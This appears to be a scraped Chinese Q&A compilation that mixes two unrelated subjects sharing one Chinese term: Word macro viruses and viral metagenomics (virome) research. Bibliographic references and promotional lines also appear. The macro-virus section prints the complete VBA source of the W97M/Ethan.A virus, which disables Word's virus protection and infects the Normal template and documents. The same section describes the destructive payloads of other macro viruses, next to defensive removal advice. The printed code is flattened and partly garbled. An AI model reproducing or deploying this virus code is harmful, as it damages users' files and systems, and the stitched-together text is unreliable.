Rhoads DD, Wolcott RD,Kuskowski MA, Wolcott BM, Ward LS, Sulakvelidze A. Bacteriophage therapy ofvenous leg ulcers in humans: results of a phase I safety trial. J Wound Care2009; 18:237e43

Thomas W C, David W G S,Stephen M T, et al. Top-down control of soil fungal community composition by aglobally distributed keystone consumer. Ecology, 2013, 94(11): 2518-2528.

Thingstad TF, Lignell R.Theoretical models for the control of bacterial growth rate, abundance,diversity and carbon demand. Aquatic Microbial Ecology, 1997, 13(1): 19-27.

Ye Mao, Sun Mingming, HuangDan, et al. A review of bacteriophage therapy for pathogenic bacteriainactivation in the soil environment. Environment International, 2019, 129:488-496.

Yu P, Mathieu J, Yang Y,Alvarez PJJ. Suppression of Enteric Bacteria by Bacteriophages: Importance ofPhage Polyvalence in the Presence of Soil Bacteria[J]. Environ Sci Technol.2017 May 2;51(9):5270-5278.

Wright A, Hawkins CH, AnggardEE, Harper DR. A controlled clinical trial of a therapeutic bacteriophagepreparation in chronic otitis e to antibiotic-resistant Pseudomonasaeruginosa; a preliminary report of efficiency. Clin Otolaryngol 2009; 34:349e57.

Weinbauer MG. Ecology ofprokaryotic viruses. FEMS Microbiology Reviews, 2004, 28(2), 127-181.

王光华.掀开土壤生物“暗物质”——土壤病毒的神秘面纱[J].中国科学院院刊,2017,32(06):575-584.

❸ 宏病毒是什么,在电子表格中怎么样清除

宏是Word 里一个非常有用的工具，但也是Word 的安全漏洞之一。有一些恶意的人利用宏制造宏病毒，给别人带来麻烦。宏病毒是一种寄存在文档或模板的宏中的计算机病毒。一旦打开这样的文档，宏病毒就会被激活，转移到计算机上，并驻留在 Normal 模板上。从此以后，所有自动保存的文档都会“感染”上这种宏病毒，而且如果其他用户打开了感染病毒的文档，宏病毒又会转移到他的计算机上。1 宏病毒宏病毒已经成为发展最快和传播最迅速的病毒。美国国际计算机安全协会ICSA 的《ICSA 1998 病毒流行调查报告》表明宏病毒独占 1998 年十大病毒感染事件的72%，在十大病毒中占了五席交椅： WM/Concept、WM/Cap、WM/Wazzu、WM/Npad 和XM/Laroux。根据 DataFellow 公司每天特征码升级的F-Macro 所检测到的宏病毒数目，至1998 年12 月达到了3,332 个，而在1997 年12 月才是1,821 个，增长率为83.0%。而且F-Macro 并不能检测到所有宏病毒。在1998 年12 月出现了Word Class Object 的宏病毒，是由VicodinES 编写的。1.1 宏病毒许多应用程序都允许在用户的数据库中包含一些宏，随着应用软件的进步，宏语言的功能也越来越强大，其中微软的Word Visual Basic for Application（VBA）已经成为应用软件宏语言的标准。利用宏语言，可以实现几乎所有的操作，还可以实现一些应用软件原来没有的功能。每个模板或数据文件中，都可以包含宏命令。有不少应用软件允许用户利用宏修改软件菜单的功能，并可以将某一个宏加入到菜单中或设置成自动运行的命令。利用这个功能，宏就可以修改软件本身的功能，从而将软件本身修改为病毒传播的源泉。宏病毒就是利用Word VBA 进行编写的一些宏，这些宏可以自动运行，干扰用户工作，轻则降低工作效率，重则破坏文件，使用户遭受巨大损失。一旦打开含有宏病毒的文档，其中的宏就会被执行，于是宏病毒就会被激活，转移到计算机上，并驻留在Normal 模板上。从此以后，所有自动保存的文档都会“感染”上这种宏病毒，而且如果其他用户打开了感染病毒的文档，宏病毒又会转移到他的计算机上。宏病毒成为传播最快的病毒，其原因有三个：第一，现在用户几乎对可执行文件病毒和引导区病毒已经有了比较一致的认识，对这些病毒的防治都有一定的经验，许多公司、企业对可执行文件和磁盘的交换都有严格的规定。但对宏病毒的危害还没有足够的认识，而现在主要的工作就是交换数字文件，因此使宏病毒得到迅速传播。第二，现在的查病毒、防病毒软件主要是针对可执行文件和磁盘引导区设计的，一般都假定数据文件中不会存在病毒，而人们相信查病毒软件的结论，从而使隐藏在数据文件中的病毒成为漏网之鱼。第三，CD-ROM 和Interenet 使病毒的传播速度大大加快。如果某个文档中包含了宏病毒，我们称此文档感染了宏病毒；如果Word 系统中的模板包含了宏病毒，我们称Word 系统感染了宏病毒。Word 2000 无法扫描软盘、硬盘或网络驱动器上的宏病毒（要得到这种保护，需要购买和安装专门的防病毒软件）。但当打开一个含有可能携带病毒的宏的文档时，它能够显示宏警告信息。这样就可选择打开文档时是否要包含宏，如果希望文档包含要用到的宏（例如，单位所用的定货窗体），打开文档时就包含宏。如果您并不希望在文档中包含宏，或者不了解文档的确切来源。例如，文档是作为电子邮件的附件收到的，或是来自网络或不安全的Internet 节点。在这种情况下，为了防止可能发生的病毒传染，打开文档过程中出现宏警告提示时最好选择【取消宏】。Word 软件包安装后，系统中包含有关于宏病毒防护的选项，其默认状态是允许【宏病毒保护】复选框。如果愿意，可以终止系统对文档宏病毒的检查。当Word 显示宏病毒警告信息时，清除【在打开带有宏或自定义内容的文档时提问】复选框。或者关闭宏检查：单击【工具】菜单中的【宏】命令，再从级联菜单中选择【安全性】命令，出现【安全性】对话框，选择【安全级】选项卡，将安全级别设为【无】。不过一般建议用户不要取消宏病毒防护功能，否则会失去这道防护宏病毒的天然屏障。1.2 宏病毒示例为了更好地理解宏病毒， 我们仔细分析一下宏病毒 W97M/Ethan.A。下面是该病毒的代码。Private Sub Document_Close（）On Error Resume Nexts = ActiveDocument.SavedApplication.EnableCancelKey = Not -1With Options: .ConfirmConversions = 0: .VirusProtection= 0: .SaveNormalPrompt = 0: End WithRandomizeIf Dir（"c:\ethan.___", 6） = "" ThenOpen "c:\ethan.___" For Output As #1For i = 1 To MacroContainer.VBProject.VBComponents.Item（1）.CodeMole.CountOfLinesa = MacroContainer.VBProject.VBComponents.Item（1）.CodeMole.Lines（i, 1）Print #1, aNext iClose #1SetAttr "c:\ethan.___", 6End IfIf Dir（"c:\class.sys"） <>"" Then Kill "c:\class.sys"If NormalTemplate.VBProject.VBComponents.Item（ 1 ） .CodeMole.Lines （ 1, 1 ） <>"Private SubDocument_Close（）" ThenSet t = NormalTemplate.VBProject.VBComponents.Item（1）ElseIf ActiveDocument.VBProject.VBComponents.Item（ 1 ） .CodeMole.Lines （ 1, 1 ） <>"Private SubDocument_Close（）" ThenSet t = ActiveDocument.VBProject.VBComponents.Item（1）Elset = ""End IfIf t <>"" ThenOpen "c:\ethan.___" For Input As #1If LOF（1） = 0 Then GoTo qi = 1Do While Not EOF（1）Line Input #1, at.CodeMole.InsertLines i, ai = i + 1Loopq:Close #1If Rnd < 0.3 Then With Dialogs（ wdDialogFileSummaryInfo ） : .Title = "EthanFrome": .Author = "EW/LN/CB": .Keywords ="Ethan": .Execute: End WithIf Left（ActiveDocument.Name, 8） <>"Document" ThenActiveDocument.SaveAsFileName:=ActiveDocument.FullNameEnd IfIf ActiveDocument.Saved <>s Then ActiveDocument.Saved= sEnd Sub W97M/Ethan.A 是一种寄生型宏病毒，由一个宏组成，能够感染 Word 系统中的文档和模板。在感染过程中，W97M/Ethan.A 使用一种特殊的算法，从自己的源文件向宿主文件传送病毒代码，在源文件中存放的是以VBA 代码形式存放的病毒程序。一旦感染成功，W97M/Ethan.A 会删除自身的有关文件，隐藏踪迹，并将感染所有访问过的Word 文件。在被感染的Word 文件中，大概有三成几率的文件属性会被病毒更改，其标题会被改为“Ethan Frome”，而作者会被改为“EW/LN/CB”。如果发现上述特征，则说明此文档已被W97M/Ethan.A 宏病毒感染。对已感染的文档进行操作，可能会出现以下问题：（1）在存储文档时，无法以Word 文档格式存储，而只能存储为 Word 模板格式。（2）在打开文档时，Word 系统会向用户询问文档的开启密码，否则无法访问该文件。（3）在清除了宏病毒之后，仍然看不到Word 系统中的某些命令或选项，它们可能已被宏病毒删除。消息来源:中国信用财富网 http://www.creding.com

❹ 宏基因组和宏病毒组的区别是什么

①.
宏基因组是研究所有微生物，病毒占比很少，在宏基因组中研究病毒组就像是大海捞针。宏病毒组的方法就像是用吸铁石，把宏基因组中病毒组部分吸出来，只看病毒就能避免宿主、细菌序列的影响。另外，宏病毒组分析流程和宏基因组有很大区别。
②.
病毒宏基因组测序又称宏病毒组，是在宏基因组学理论的基础上，结合现有的病毒分子生物学检测技术而兴起的一个新的学科分支。 宏病毒组直接以环境中所有病毒的遗传物质为研究对象，鉴定环境中的病毒组成， 是一种发现新病毒、 病毒感染预警和控制的手段， 在病毒的起源和进化模式、遗传多样性和地理分布等研究方面也具有重要意义。
网络或微信搜索“基因帮”，获取更多文章咨询、行业进展以及病毒组相关技术。

❺ 在excel中“宏”是什么意思有什么作用

宏可以做什么
所有你想同时完成的事情都可以让宏来一次完成，并且所有会不断重复的命令（比如说话或其他动作）都可以事先宏里面定义好

1、什么是宏？

宏是微软公司为其OFFICE软件包设计的一个特殊功能，目的是让用户文档中的一些任务自动化。OFFICE中的WORD和EXEAL都有宏。在下面的讨论中我们以WORD为例。

如果在Word中重复进行某项工作，可用宏使其自动执行。宏是将一系列的Word命令和指令组合在一起，形成一个命令，以实现任务执行的自动化。您可创建并执行一个宏，以替代人工进行一系列费时而重复的 Word操作。

以下是宏的一些典型应用：

加速日常编辑和格式设置

组合多个命令

使对话框中的选项更易于访问

使一系列复杂的任务自动执行

Word提供了两种创建宏的方法：宏录制器和Visual Basic编辑器。

宏录制器可帮助您开始创建宏。Word在Visual Basic for Applications编程语言中把宏录制为一系列的Word命令。

可在Visual Basic编辑器中打开已录制的宏，修改其中的指令。也可用Visual Basic编辑器创建包括Visual Basic指令的非常灵活和强有力的宏。

您可将宏保存到模板或文档中。在默认的情况下，Word将宏存贮在 Normal模板中，以便所有的Word文档均能使用。注意这一特点几乎为所有的宏病毒所利用
2、什么是宏病毒？

宏病毒是一种寄存在文档或模板的宏中的计算机病毒。一旦打开这样的文档，其中的宏就会被执行，于是宏病毒就会被激活，转移到计算机上，并驻留在Normal模板上。从此以后，所有自动保存的文档都会 “感染”上这种宏病毒，而且如果其他用户打开了感染病毒的文档，宏病毒又会转移到他的计算机上。

如果某个文档中包含了宏病毒，我们称此文档感染了宏病毒；如果 WORD系统中的模板包含了宏病毒，我们称WORD系统感染了宏病毒。

虽然OFFICE97/Word97无法扫描软盘、硬盘或网络驱动器上的宏病毒（要得到这种保护，需要购买和安装专门的防病毒软件）。但当打开一个含有可能携带病毒的宏的文档时，它能够显示宏警告信息。

这样就可选择打开文档时是否要包含宏，如果希望文档包含要用到的宏（例如，单位所用的定货窗体），打开文档时就包含宏。

如果您并不希望在文档中包含宏，或者不了解文档的确切来源。例如，文档是作为电子邮件的附件收到的，或是来自网络或不安全的 Internet节点。在这种情况下，为了防止可能发生的病毒传染，打开文档过程中出现宏警告提示时最好选择“取消宏”。

OFFICE97软件包安装后，系统中包含有关于宏病毒防护的选项，其默认状态是允许“宏病毒保护”复选框。如果愿意，您可以终止系统对文档宏病毒的检查。当Word显示宏病毒警告信息时，清除“在打开带有宏或自定义内容的文档时提问”复选框。或者关闭宏检查：单击“工具”菜单中的“选项”命令，再单击“常规”选项卡，然后清除“宏病毒保护”复选框。

不过我强烈建议您不要取消宏病毒防护功能，否则您会失去这道防护宏病毒的天然屏障。

二、宏病毒的判断方法

虽然不是所有包含宏的文档都包含了宏病毒，但当有下列情况之一时，您可以百分之百地断定您的OFFICE文档或OFFICE系统中有宏病毒：

1、在打开“宏病毒防护功能”的情况下，当您打开一个您自己写的文档时，系统会会弹出相应的警告框。而您清楚您并没有在其中使用宏或并不知道宏到底怎么用，那么您可以完全肯定您的文档已经感染了宏病毒。

2、同样是在打开“宏病毒防护功能”的情况下，您的OFFICE文档中一系列的文件都在打开时给出宏警告。由于在一般情况下我们很少使用到宏，所以当您看到成串的文档有宏警告时，可以肯定这些文档中有宏病毒。
3、如果软件中关于宏病毒防护选项启用后，不能在下次开机时依然保存。WORD97中提供了对宏病毒的防护功能，它可以在“工具/选项/常规”中进行设定。但有些宏病毒为了对付OFFICE97中提供的宏警告功能，它在感染系统（这通常只有在您关闭了宏病毒防护选项或者出现宏警告后您不留神选取了“启用宏”才有可能）后，会在您每次退出 OFFICE时自动屏蔽掉宏病毒防护选项。因此您一旦发现:您的机器中设置的宏病毒防护功能选项无法在两次启动WORD之间保持有效，则您的系统一定已经感染了宏病毒。也就是说一系列WORD模板、特别是normal.dot 已经被感染。

鉴于绝大多数人都不需要或着不会使用“宏”这个功能，我们可以得出一个相当重要的结论：如果您的OFFICE文档在打开时，系统给出一个宏病毒警告框，那么您应该对这个文档保持高度警惕，它已被感染的几率极大。注意：简单地删除被宏病毒感染的文档并不能清除OFFICE系统中的宏病毒！

三、宏病毒的防治和清除

1、首选方法：用最新版的反病毒软件清除宏病毒。使用反病毒软件是一种高效、安全和方便的清除方法，也是一般计算机用户的首选方法。但是宏病毒并不象某些厂商或麻痹大意的人那样认为的有所谓“广谱”的查杀软件，这方面的突出例子就是ETHAN宏病毒。

ETHAN宏病毒相当隐蔽，比如您使用KV300 Z+、RAV V9.0(11)、 KILL 85.03等反病毒软件（应该算比较新的版本了）都无法查出它。此外这个宏病毒能够悄悄取消WORD中宏病毒防护选项，并且某些情况下会把被感染的文档置为只读属性，从而更好地保存了自己。

因此，对付宏病毒应该和对付其它种类的病毒一样，也要尽量使用最新版的查杀病毒软件。无论你使用的是何种反病毒软件，及时升级是非常重要的。比如虽然KV300 Z+版不能查杀ETHAN宏病毒，但最新推出的KV300 Z++已经可以查杀它。

2、应急处理方法：用写字板或WORD 6.0文档作为清除宏病毒的桥梁。如果您的WORD系统没有感染宏病毒，但需要打开某个外来的、已查出感染有宏病毒的文档，而手头现有的反病毒软件又无法查杀它们，那么您可以试验用下面的方法来查杀文档中的宏病毒：打开这个包含了宏病毒的文档（当然是启用WORD中的“宏病毒防护”功能并在宏警告出现时选择“取消宏”），然后在“文件”菜单中选择“另存为”，将此文档改存成写字板（RTF）格式或WORD6.0格式。

在上述方法中，存成写字板格式是利用RTF文档格式没有宏，存成 WORD 6.0格式则是利用了WORD97文档在转换成WORD6.0格式时会失去宏的特点。写字板所用的rtf格式适用于文档中的内容限于文字和图片的情况下，如果文档内容中除了文字、图片外还有图形或表格，那么按 WORD6.0格式保存一般不会失去这些内容。

存盘后应该检查一下文档的完整性，如果文档内容没有任何丢失，并且在重新打开此文档时不再出现宏警告则大功告成。

❻ 宏病毒组技术与宏基因组有什么不同吗

用宏基因组来研究病毒是前几年用的比较多的方法，但是缺点很明显，宏基因组数据95%以上为宿主基因组污染，而细菌基因组DNA含量是病毒DNA的15倍左右，因此在剩下的不足5%，甚至通常不到1%的数据中，病毒DNA的reads比例也非常低，造成检测到的病毒DNA远低于样品中实际的病毒水平。由此可见，通过宏基因组的数据对病毒进行研究，会造成对病毒组认识的偏差。因而，去除宿主和细菌DNA后，单独对病毒组进行研究非常有必要。

所以利用宏病毒组的方法来研究病毒的优势就非常明显，也越来越受到相关科研团队的关注。宏病毒组的特点是只对样本中的病毒组序列进行研究，这样的话就避免掉了宿主以及细菌序列的影响，能够极大的提高数据的利用率。

然而，病毒组数据分析也面临如下挑战：（1）由于病毒非常小、进化速度快且难于培养，因此对病毒的研究相对困难。此外病毒缺乏类似于细菌16S rRNA基因序列的系统发育标记，对于环境病毒组的研究变得更为复杂。要对环境样本中的所有病毒进行研究，不可避免的会受到样本中其他物种DNA的影响；（2）病毒数据库不够丰富，病毒群落的基本结构和功能性研究还比较难。

由于人体各个部分的微环境不同，因此不同部位的病毒组均存在差异。其次，年龄、饮食习惯以及宏基因组中的其他组分等因素也会影响病毒组的组分构成。利用二代测序技术对病毒组进行研究，不仅可以在健康人群和患病个体中发现新的病毒，也可以研究特定疾病与病毒的关系。病毒组研究最有意思的发现之一是病毒与微生物组中的其他组分相互作用，尤其是细菌。病毒与细菌之间的相互影响可以增强或减弱抗病毒免疫反应从而控制病毒感染。这种影响是相互的，病毒也可以反过来调控细菌感染。对于在宿主特定遗传环境下病毒与其他微生物的相互作用及其对病人健康状态的影响的研究才刚刚起步，有待进一步深入，但目前的研究结果表明病毒及其他微生物对免疫反应的调节会影响感染的结果。
近两年，许多科学家越来越多的开始关注病毒组，在实验技术的改进和数据库的扩充上有重要的进展。但总体来说，目前病毒组研究的报道要么是基于人类基因组计划产出的全基因组测序数据，要么样本量有限，还有许多未知的领域有待探索。
想了解更多关于“宏病毒组”的相关信息，网络或微信搜索“基因帮”。

❼ 宏病毒基因测序和宏病毒组是一样的吗

一样的。病毒宏基因组测序又称宏病毒组（Virome），是在宏基因组学理论的基础上，结合现有的病毒分子生物学检测技术而兴起的一个新的学科分支。 宏病毒组直接以环境中所有病毒的遗传物质为研究对象，鉴定环境中的病毒组成， 是一种发现新病毒、 病毒感染预警和控制的手段， 在病毒的起源和进化模式、遗传多样性和地理分布等研究方面也具有重要意义。

❽ 我最近想做宏病毒组相关的课题，有人知道宏病毒组生信分析主要分析那些东西

1.真核病毒与噬菌体分类
2.噬菌体宿主预测
3.病毒组成分析
4.α，β多样性分析
5.PCA/PCoA/NMDS/聚类分析
6.组间差异/LEfSe分析
7.Core virus分析
8.病毒丰度分析
9.DESeq差异病毒筛选
想了解更多关于“宏病毒组”的相关信息，网络或微信搜索“基因帮”。

❾ 宏病毒的分析

宏病毒传播途径主要有：
1，软盘交流染毒文档文件；
2，硬盘染毒，处理的文档文件必将染毒；
3，光盘携带宏病毒；
4，Internet上下载染毒文档文件；
5，BBS交流染毒文档文件；
6，电子邮件的附件夹带病毒。
两支宏病毒分析
1，Nuclear宏病毒
这是一个对操作系统文件和打印输出有破坏功能的宏病毒。这个宏病毒中包含以下病毒宏：sertPayloadPayload这些宏是只执行（Execute-only）宏。
Nuclear宏病毒造成的破坏现象为：
（1）打开一个染毒文档并打印的时候，它会在您打印的最后一段加上“STOPALLFRENCHNUCLEARTESTING
INTHEPACIFIC！”，这个现象是在每分钟的55秒～60秒之间操作打印时发生。
（2）如果在每天17:00～18:00之间打开一个染毒文档，Nuclear病毒会将PH33R病毒传染到计算机上，这是个驻留型病毒。
（3）在每年的4月5日，该病毒会将计算机上IO.SYS和MSDOS.SYS文件清零，并且删除C盘根目录上的COMMAND. COM文件。一旦病毒发作，MSDOS就不可能被引导，计算机将陷入瘫痪。
2，台湾一号病毒
台湾一号病毒会在每月的13日影响您正常使用Word文档和编辑器。它包含以下病毒宏：AutoCloseAutoNewAutoOpen这些宏是可被编辑宏。在病毒宏中含有如下的语句：IfDay(Now())=13Then...这条语句与13日有关。台湾一号病毒造成的危害是：在每月13日，若用户使用Word打开一个带毒的文档（模板）时，病毒会被激发。激发时的现象是：在屏幕正中央弹出一个对话框，该对话框提示用户做一个心算题，如做错，它将会无限制地打开文件，直至Word内存不够，Word出错为止；如心算题做对，会提示用户“什么是巨集病毒（宏病毒）？”，回答“我就是巨集病毒”，再提示用户：“如何预防巨集病毒？”，回答是“不要看我”。

❿ 我想做病毒组相关的课题，病毒组研究的难点有哪些方面有谁知道吗

①.病毒组研究的滞后主要是因为科学家们对病毒组的重要性的认识晚于对细菌的认识，以及缺乏成熟的病毒组研究技术。
（1）病毒实验难：由于病毒非常小、进化速度快且难于培养，因此对病毒的研究相对困难。此外病毒缺乏类似于细菌16S rRNA基因序列的系统发育标记，对于环境病毒组的研究变得更为复杂。要对环境样本中的所有病毒进行研究，不可避免的会受到样本中其他物种DNA的影响。
（2）生信分析难：宏基因组学方法已经成为当下研究微生态最热门的方法，与宏基因组类似，宏病毒组学也成为病毒生态学研究的主体。然而，将宏基因组技术应用于病毒组学研究时所产生的结果及对结果的解读仍存在一些问题。例如，在提取VLPs的过程中，游离的、可活跃复制的噬菌体颗粒成为分析的重点，限制了部分温和噬菌体DNA信息的获取。由于提取的DNA水平较低，扩增过程可能会漏掉某些含量极低的噬菌体类型，这会使获得的病毒组信息产生偏差。尽管独立于培养的方法减轻了繁杂的实验工作，并能获得更大量的信息，但研究者必须使用其他生物信息学方法来间接推断病毒的宿主范围信息你也可以网络下。